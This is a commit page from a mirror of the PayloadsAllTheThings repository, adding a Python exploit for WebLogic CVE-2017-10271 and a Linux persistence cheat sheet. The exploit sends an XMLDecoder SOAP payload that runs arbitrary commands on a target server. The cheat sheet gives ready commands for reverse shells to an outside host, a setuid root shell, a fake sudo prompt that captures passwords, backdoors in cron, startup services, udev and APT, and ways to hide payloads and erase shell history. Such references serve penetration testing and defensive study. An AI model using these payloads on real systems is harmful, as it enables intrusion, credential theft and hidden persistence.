mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Linux Persistence + WebLogic RCE
This commit is contained in:
parent
011baa7321
commit
beb0ce8c54
61
CVE Exploits/WebLogic CVE-2017-10271.py
Normal file
61
CVE Exploits/WebLogic CVE-2017-10271.py
Normal file
@ -0,0 +1,61 @@
|
|||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
|
||||||
|
url_in = sys.argv[1]
|
||||||
|
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
|
||||||
|
payload_header = {'content-type': 'text/xml'}
|
||||||
|
|
||||||
|
|
||||||
|
def payload_command (command_in):
|
||||||
|
html_escape_table = {
|
||||||
|
"&": "&",
|
||||||
|
'"': """,
|
||||||
|
"'": "'",
|
||||||
|
">": ">",
|
||||||
|
"<": "<",
|
||||||
|
}
|
||||||
|
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
|
||||||
|
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
|
||||||
|
" <soapenv:Header> " \
|
||||||
|
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
|
||||||
|
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
|
||||||
|
" <void class=\"java.lang.ProcessBuilder\"> \n" \
|
||||||
|
" <array class=\"java.lang.String\" length=\"3\">" \
|
||||||
|
" <void index = \"0\"> " \
|
||||||
|
" <string>cmd</string> " \
|
||||||
|
" </void> " \
|
||||||
|
" <void index = \"1\"> " \
|
||||||
|
" <string>/c</string> " \
|
||||||
|
" </void> " \
|
||||||
|
" <void index = \"2\"> " \
|
||||||
|
+ command_filtered + \
|
||||||
|
" </void> " \
|
||||||
|
" </array>" \
|
||||||
|
" <void method=\"start\"/>" \
|
||||||
|
" </void>" \
|
||||||
|
" </java>" \
|
||||||
|
" </work:WorkContext>" \
|
||||||
|
" </soapenv:Header>" \
|
||||||
|
" <soapenv:Body/>" \
|
||||||
|
"</soapenv:Envelope>"
|
||||||
|
return payload_1
|
||||||
|
|
||||||
|
def do_post(command_in):
|
||||||
|
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
|
||||||
|
|
||||||
|
if result.status_code == 500:
|
||||||
|
print "Command Executed \n"
|
||||||
|
else:
|
||||||
|
print "Something Went Wrong \n"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
print "***************************************************** \n" \
|
||||||
|
"**************** Coded By 1337g ****************** \n" \
|
||||||
|
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
|
||||||
|
"***************************************************** \n"
|
||||||
|
|
||||||
|
while 1:
|
||||||
|
command_in = raw_input("Eneter your command here: ")
|
||||||
|
if command_in == "exit" : exit(0)
|
||||||
|
do_post(command_in)
|
96
Methodology and Resources/Linux - Persistence.md
Normal file
96
Methodology and Resources/Linux - Persistence.md
Normal file
@ -0,0 +1,96 @@
|
|||||||
|
# Linux - Persistence
|
||||||
|
|
||||||
|
## Basic reverse shell
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ncat --udp -lvp 4242
|
||||||
|
ncat --sctp -lvp 4242
|
||||||
|
ncat --tcp -lvp 4242
|
||||||
|
```
|
||||||
|
|
||||||
|
## Suid Binary
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
TMPDIR2="/var/tmp"
|
||||||
|
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
|
||||||
|
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
|
||||||
|
rm $TMPDIR2/croissant.c
|
||||||
|
chown root:root $TMPDIR2/croissant
|
||||||
|
chmod 4777 $TMPDIR2/croissant
|
||||||
|
```
|
||||||
|
|
||||||
|
## Crontab (Reverse shell to 192.168.1.2 on port 4242)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
|
||||||
|
```
|
||||||
|
|
||||||
|
## Backdooring an user's bash_rc (FR/EN Version)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
|
||||||
|
cat << EOF > /tmp/$TMPNAME2
|
||||||
|
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
|
||||||
|
EOF
|
||||||
|
if [ -f ~/.bashrc ]; then
|
||||||
|
cat /tmp/$TMPNAME2 >> ~/.bashrc
|
||||||
|
fi
|
||||||
|
if [ -f ~/.zshrc ]; then
|
||||||
|
cat /tmp/$TMPNAME2 >> ~/.zshrc
|
||||||
|
fi
|
||||||
|
rm /tmp/$TMPNAME2
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Backdooring a startup service
|
||||||
|
|
||||||
|
```bash
|
||||||
|
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
|
||||||
|
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
|
||||||
|
```
|
||||||
|
|
||||||
|
## Backdooring a driver
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
|
||||||
|
```
|
||||||
|
|
||||||
|
## Backdooring the APT
|
||||||
|
|
||||||
|
If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};`
|
||||||
|
Next time "apt-get update" is done, your CMD will be executed!
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
|
||||||
|
```
|
||||||
|
|
||||||
|
## Tips
|
||||||
|
|
||||||
|
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
#[2J[2J[2J[2H[2A# Do not remove. Generated from /etc/issue.conf by configure.
|
||||||
|
```
|
||||||
|
|
||||||
|
Clear the last line of the history.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
|
||||||
|
```
|
||||||
|
|
||||||
|
The following directories are temporary and usually writeable
|
||||||
|
|
||||||
|
```bash
|
||||||
|
/var/tmp/
|
||||||
|
/tmp/
|
||||||
|
/dev/shm/
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
|
||||||
|
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
||||||
|
* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
|
||||||
|
* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html)
|
||||||
|
* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/)
|
||||||
|
* [Pouki from JDI](#no_source_code)
|
Loading…
Reference in New Issue
Block a user